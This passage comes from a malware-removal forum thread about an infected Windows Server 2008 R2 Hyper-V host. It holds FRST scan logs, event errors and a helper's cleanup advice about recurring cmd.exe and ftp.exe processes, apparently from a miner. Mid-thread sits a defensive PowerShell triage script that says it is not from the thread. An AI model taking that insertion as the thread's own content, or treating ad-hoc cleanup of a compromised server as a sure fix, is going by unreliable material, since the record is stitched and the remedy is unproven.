2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQISCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\STORALRT.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQSAS.DLL
2013-11-30 11:20 - 2010-01-28 11:10 - 01411584 _____ () C:\hp\hpsmh\bin\LIBEAY32.dll
2013-11-30 11:20 - 2010-01-28 11:04 - 00266240 _____ () C:\hp\hpsmh\bin\SSLEAY32.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\modules\libxml2.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============


==================== Faulty Device Manager Devices =============

Name: HP NC326i PCIe Dual Port Gigabit Server Adapter #2
Description: HP NC326i PCIe Dual Port Gigabit Server Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard Company
Service: q57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-18T20:00:28.657531100Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-17T20:00:22.935534100Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-16T20:00:22.359033800Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/16/2014 01:54:09 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-15T20:00:20.691355600Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/14/2014 09:00:09 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-14T20:00:09.979196700Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.


System errors:
=============
Error: (02/19/2014 09:33:26 AM) (Source: UmrdpService) (User: )
Description: Driver Canon LBP6750/3560 Class Driver required for printer Canon-506 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:23 AM) (Source: UmrdpService) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:22 AM) (Source: UmrdpService) (User: )
Description: Driver PDFCreator required for printer PDFCreator is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:22 AM) (Source: UmrdpService) (User: )
Description: Driver Canon iR C2880/C3380 Class Driver required for printer iR C3380 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:21 AM) (Source: UmrdpService) (User: )
Description: Driver Send to Microsoft OneNote 15 Driver required for printer Send To OneNote 2013 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 09:33:19 AM) (Source: UmrdpService) (User: )
Description: Driver TOSHIBA Universal Printer 2 required for printer !!olamserver.olam.local!TOSHIBA eSTUDIO 2550 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/19/2014 02:52:42 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.106.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/19/2014 02:25:23 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.90.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/18/2014 06:52:43 PM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.52.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (02/18/2014 03:01:31 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the NlaSvc service.


Microsoft Office Sessions:
=========================
Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-18T20:00:28.657531100Z2155348061%%2155348061

Error: (02/18/2014 09:00:28 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-17T20:00:22.935534100Z2155348061%%2155348061

Error: (02/17/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-16T20:00:22.359033800Z2155348061%%2155348061

Error: (02/16/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/16/2014 01:54:09 AM) (Source: Winlogon)(User: )
Description:

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-15T20:00:20.691355600Z2155348061%%2155348061

Error: (02/15/2014 09:00:20 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/14/2014 09:00:09 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-14T20:00:09.979196700Z2155348061%%2155348061


==================== Memory info ===========================

Percentage of memory in use: 98%
Total physical RAM: 14325.74 MB
Available physical RAM: 153.45 MB
Total Pagefile: 37900.44 MB
Available Pagefile: 2945.87 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:60 GB) (Free:22.43 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (Hyper-V) (Fixed) (Total:486.8 GB) (Free:145.4 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 547 GB) (Disk ID: 9C84BF43)
Partition 1: (Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=487 GB) - (Type=07 NTFS)

==================== End Of Log ============================


  • Root Admin

Well, first and foremost, as this is a Server that has been compromised, one should really delete the partitions, recreate, format, and reinstall Windows. Then restore settings and data to a previous date before this infection took place. There is never a 100% guarantee that the system will be cleaned completely of all malware.

 

That said the logs don't seem to indicate that any hidden process is running the miner anymore that I'm seeing.

 

I would recommend starting an elevated admin command prompt and changing directory to here: C:\Windows\SysWOW64

Then issue the following command: DEL TMP*.CMD

 

On another note, as this is a Server - unless used as a Terminal Server - no one should be browsing the web from the system, including Admins. That is a no-no for any server.

As such I'd recommend removing Chrome and any other Google software not 100% essential for business use. Possibly look at implementing some software restrictions on the Server as well to prevent undesirable software from running. I've not used Microsoft Forefront in a long time, but generally speaking Microsoft is not well known for their antivirus/security software, and if possible I'd recommend using another product designed for server use from maybe Symantec or Kaspersky.

 

I would highly recommend at least FULLY disabling Forefront/MSE and installing maybe a trial of Symantec or Kaspersky and doing a Full System scan with it.

 

So after doing the removal of the .CMD files - how is the computer running now?


AdvancedSetup,

 

The .cmd files keep coming back. Taskmgr shows 4 instances of cmd.exe *32 and 2 instances of ftp.exe *32, which are trying to repopulate the tanechka, mtc, pts, ric and xpm folders, but are quite unsuccessful since I've blocked ftp.exe in the firewall. However, *something* keeps placing the CMD files there and kicking them off. Also, I have never installed Google Chrome; it seems (weird and unlikely) this was also done by the malware. I've actually removed it quite a few times already.

 

This is still very much unsolved. I was hoping to be able to completely clean the server (and learn something in the process), but it seems we're gonna have to default to a complete reinstall. Too bad.

 

Thanks for your assistance so far.


  • Root Admin

Okay, let me get a new FRST scan and we'll see what we can find.

 

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

 

Also please run an elevated admin command prompt and run the following:

 

netstat -f -n -b -o

 

You can redirect the output to a text file to upload, using the following:

 

netstat -f -n -b -o >c:\MyConnections
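The two checks requested above (the process list and `netstat -f -n -b -o`) can be joined in one pass so that every 32-bit cmd.exe and ftp.exe instance is reported together with its command line, the chain of parent processes that launched it, and its TCP sockets, which is what answers the earlier question of what keeps kicking the .cmd files off. This is an added example and not code from the thread; it assumes Windows Server 2008 R2 with PowerShell 2.0, an elevated prompt, and an arbitrary output path C:\Triage-Processes.txt.

```powershell
# Added example (not from the thread): one-pass triage of the cmd.exe / ftp.exe
# instances seen in the FRST process list. Assumes PowerShell 2.0 on Windows
# Server 2008 R2 (so WMI and netstat -ano are used, not Get-NetTCPConnection)
# and an elevated prompt. The output path is an assumption.
$outFile  = 'C:\Triage-Processes.txt'
$suspects = @('cmd.exe', 'ftp.exe')

# Index every running process by PID so parent PIDs can be resolved.
$all = @{}
Get-WmiObject Win32_Process | ForEach-Object { $all[[int]$_.ProcessId] = $_ }

# Map PID -> TCP endpoints from "netstat -ano" (numeric, owning PID in last column).
$conns = @{}
netstat -ano | ForEach-Object {
    if ($_ -match '^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$') {
        $p = [int]$matches[4]
        if (-not $conns.ContainsKey($p)) { $conns[$p] = @() }
        $conns[$p] += ('{0} -> {1} [{2}]' -f $matches[1], $matches[2], $matches[3])
    }
}

$report = foreach ($proc in $all.Values) {
    if ($suspects -notcontains $proc.Name.ToLower()) { continue }

    # Walk up the parent chain (at most 5 hops). A parent PID that no longer
    # exists, or was reused, is reported as unknown rather than guessed; a
    # short-lived parent is itself a clue (scheduled task, service, script).
    $chain = @()
    $cur   = $proc
    for ($i = 0; $i -lt 5 -and $cur; $i++) {
        $chain += ('{0}({1})' -f $cur.Name, $cur.ProcessId)
        $parentId = [int]$cur.ParentProcessId
        if ($all.ContainsKey($parentId)) {
            $cur = $all[$parentId]
        } else {
            $chain += "unknown($parentId)"
            $cur = $null
        }
    }

    $key = [int]$proc.ProcessId
    if ($conns.ContainsKey($key)) { $remote = $conns[$key] -join '; ' }
    else                          { $remote = '(no TCP sockets)' }

    New-Object PSObject -Property @{
        PID         = $proc.ProcessId
        Name        = $proc.Name
        Path        = $proc.ExecutablePath
        CommandLine = $proc.CommandLine      # shows which TMP*.CMD was run
        Created     = $proc.ConvertToDateTime($proc.CreationDate)
        ParentChain = ($chain -join ' <- ')
        Connections = $remote
    }
}

$report |
    Format-List PID, Name, Path, Created, CommandLine, ParentChain, Connections |
    Out-File $outFile -Width 300

Write-Host ("Wrote {0} suspect process records to {1}" -f @($report).Count, $outFile)
```

Run it while the cmd.exe *32 instances are present; the ParentChain and Created columns show whether they are launched by a task, a service or another script, and a chain ending in unknown(...) points at a launcher that exits immediately.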

FRST.log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-02-2014 02
Ran by Administrator (administrator) on COMPANY-HV on 24-02-2014 09:53:04
Running from C:\Users\administrator.COMPANY\Desktop
Windows Server 2008 R2 Standard Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 10
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Hewlett-Packard Company) C:\Program Files\HP\Cissesrv\cissesrv.exe
(Hewlett-Packard Company) C:\Windows\system32\cpqrcmc.exe
(Hewlett-Packard Company) C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Hewlett-Packard Company) C:\Windows\system32\sysdown.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\smhstart.exe
(Hewlett-Packard Company) C:\Windows\system32\CPQNiMgt\cpqnimgt.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe
(Microsoft Corporation) C:\Windows\system32\vmms.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Hewlett-Packard Company) C:\Program Files\HP\NCU\cpqteam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\cmd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\system32\msiexec.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [CPQTEAM] - C:\Program Files\HP\NCU\cpqteam.exe [73728 2010-04-27] (Hewlett-Packard Company)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1436224 2010-11-30] (Microsoft Corporation)
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
HKLM\...\Policies\Explorer: [showSuperHidden] 1
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
Lsa: [Notification Packages] scecli rassfm

==================== Internet (Whitelisted) ====================


HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab
Handler: hpapp\Apps - No CLSID Value -
Handler-x32: hpapp\Apps - No CLSID Value -
Hosts: 188.122.70.10         scom01.asapnet.local
Tcpip\..\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: [NameServer]192.168.10.11,8.8.8.8

==================== Services (Whitelisted) =================

S4 AdtAgent; C:\Windows\system32\AdtAgent.exe [407176 2012-10-30] (Microsoft Corporation)
S4 CIMnotify; C:\Windows\system32\CIMntfy\cimntfy.exe [268392 2010-05-26] (Hewlett-Packard Company)
R2 Cissesrv; C:\Program Files\HP\Cissesrv\cissesrv.exe [167424 2010-03-19] (Hewlett-Packard Company)
R2 CpqNicMgmt; C:\Windows\system32\CPQNiMgt\cpqnimgt.exe [9728 2010-04-28] (Hewlett-Packard Company)
R2 CpqRcmc; C:\Windows\system32\cpqrcmc.exe [22568 2008-11-14] (Hewlett-Packard Company)
R2 cpqvcagent; C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe [1307648 2010-03-25] (Hewlett-Packard Company)
R2 CqMgHost; C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgServ; C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgStor; C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe [20992 2010-04-09] (Hewlett-Packard Company)
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-14] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe [25200 2012-10-30] (Microsoft Corp.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2010-11-11] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [282616 2010-11-11] (Microsoft Corporation)
R2 nvspwmi; C:\Windows\system32\nvspwmi.dll [407040 2010-11-21] (Microsoft Corporation)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-14] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-14] (Microsoft Corporation)
S2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
R2 sysdown; C:\Windows\system32\sysdown.exe [17960 2010-01-25] (Hewlett-Packard Company)
R2 SysMgmtHp; C:\hp\hpsmh\bin\smhstart.exe [2041856 2010-01-28] (Hewlett-Packard Company)
S4 System Center Management APM; C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe [633968 2012-10-30] (Microsoft Corp.)
R2 vhdsvc; C:\Windows\system32\vhdsvc.dll [193024 2010-11-21] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [4625408 2010-11-21] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 ati2mtag; C:\Windows\System32\DRIVERS\ati2mtag.sys [2210816 2009-06-24] (ATI Technologies Inc.)
R3 CpqCiDrv; C:\Windows\System32\DRIVERS\cpqcidrv.sys [51752 2009-05-11] (Hewlett-Packard Company)
S3 CPQTeam; C:\Windows\System32\DRIVERS\cpqteam.sys [225792 2010-02-24] (Hewlett-Packard Company)
R0 HpCISSs2; C:\Windows\System32\DRIVERS\HpCISSs2.sys [156776 2010-02-22] (Hewlett-Packard Company)
R0 hpqilo2; C:\Windows\System32\DRIVERS\hpqilo2.sys [160296 2010-01-25] (Hewlett-Packard Company)
R1 hvboot; C:\Windows\System32\drivers\hvboot.sys [119168 2010-11-21] (Microsoft Corporation)
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [188928 2010-10-24] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [72064 2010-10-24] (Microsoft Corporation)
R3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [20992 2010-11-21] (Microsoft Corporation)
R3 q57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [384040 2010-04-30] (Broadcom Corporation)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-14] (Microsoft Corporation)
R3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [17408 2010-11-21] (Microsoft Corporation)
R3 VMSMP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)
S3 VMSP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)

========================== Drivers MD5 =======================

C:\Windows\system32\drivers\1394ohci.sys ==> MD5 is legit
C:\Windows\System32\drivers\ACPI.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\acpipmi.sys ==> MD5 is legit
C:\Windows\system32\drivers\adp94xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpu320.sys ==> MD5 is legit
C:\Windows\system32\drivers\afd.sys 79059559E89D06E8B80CE2944BE20228
C:\Windows\system32\drivers\agp440.sys ==> MD5 is legit
C:\Windows\system32\drivers\aliide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdk8.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsata.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsbs.sys ==> MD5 is legit
C:\Windows\System32\drivers\amdxata.sys ==> MD5 is legit
C:\Windows\system32\drivers\appid.sys ==> MD5 is legit
C:\Windows\system32\drivers\arc.sys ==> MD5 is legit
C:\Windows\system32\drivers\arcsas.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\asyncmac.sys ==> MD5 is legit
C:\Windows\System32\drivers\atapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ati2mtag.sys 8BF2F7453BA6233F76A45FB1E73B7419
C:\Windows\system32\drivers\bxvbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys C1E625A71A82226FA39C1296C5940291
C:\Windows\System32\Drivers\Beep.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\blbdrive.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bowser.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltLo.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltUp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Brserid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrSerWdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbMdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbSer.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdfs.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdrom.sys ==> MD5 is legit
C:\Windows\System32\CLFS.sys ==> MD5 is legit
C:\Windows\system32\drivers\CmBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\cmdide.sys ==> MD5 is legit
C:\Windows\System32\Drivers\cng.sys EBF28856F69CF094A902F884CF989706
C:\Windows\system32\drivers\compbatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\CompositeBus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cpqcidrv.sys 42359CD29C14C94ACE1F908852259E28
C:\Windows\System32\DRIVERS\cpqteam.sys D1EAFA0F8F4FF31A544F43110E6CDA8B
C:\Windows\system32\drivers\crcdisk.sys ==> MD5 is legit
C:\Windows\System32\Drivers\dfsc.sys ==> MD5 is legit
C:\Windows\System32\drivers\discache.sys ==> MD5 is legit
C:\Windows\System32\drivers\disk.sys ==> MD5 is legit
C:\Windows\system32\drivers\dmvsc.sys 5DB085A8A6600BE6401F2B24EECB5415
C:\Windows\System32\drivers\dxgkrnl.sys 88612F1CE3BF42256913BF6E61C70D52
C:\Windows\system32\drivers\evbda.sys ==> MD5 is legit
C:\Windows\system32\drivers\elxstor.sys ==> MD5 is legit
C:\Windows\system32\drivers\errdev.sys ==> MD5 is legit
C:\Windows\System32\Drivers\exfat.sys ==> MD5 is legit
C:\Windows\System32\Drivers\fastfat.sys ==> MD5 is legit
C:\Windows\system32\drivers\fdc.sys ==> MD5 is legit
C:\Windows\System32\drivers\fileinfo.sys ==> MD5 is legit
C:\Windows\System32\drivers\filetrace.sys ==> MD5 is legit
C:\Windows\system32\drivers\flpydisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\fltmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\FsDepends.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Fs_Rec.sys 6BD9295CC032DD3077C671FCCF579A7B
C:\Windows\system32\drivers\gagp30kx.sys ==> MD5 is legit
C:\Windows\system32\drivers\HDAudBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\HidBatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hidusb.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\HpCISSs2.sys 64F1B1D6DFA66F59F552864B4FBE7680
C:\Windows\System32\DRIVERS\hpqilo2.sys D6EF2C4F0B02FD82FAC3887086D56443
C:\Windows\System32\drivers\HpSAMD.sys ==> MD5 is legit
C:\Windows\System32\drivers\HTTP.sys ==> MD5 is legit
C:\Windows\System32\drivers\hvboot.sys A31E10560985A0AF994E86F80C458E76
C:\Windows\System32\drivers\hwpolicy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\i8042prt.sys ==> MD5 is legit
C:\Windows\system32\drivers\iaStorV.sys ==> MD5 is legit
C:\Windows\system32\drivers\iirsp.sys ==> MD5 is legit
C:\Windows\system32\drivers\intelide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\intelppm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\qd260x64.sys FF0FB51A0ACC2E2D0D412138A05A0B59
C:\Windows\System32\DRIVERS\ipfltdrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\IPMIDrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\ipnat.sys ==> MD5 is legit
C:\Windows\system32\drivers\isapnp.sys ==> MD5 is legit
C:\Windows\system32\drivers\msiscsi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdhid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ksecdd.sys 8F489706472F7E9A06BAAA198703FA64
C:\Windows\System32\Drivers\ksecpkg.sys 868A2CAAB12EFC7A021682BCA0EEC54C
C:\Windows\system32\drivers\ksthunk.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\lltdio.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_fc.sys ==> MD5 is legit
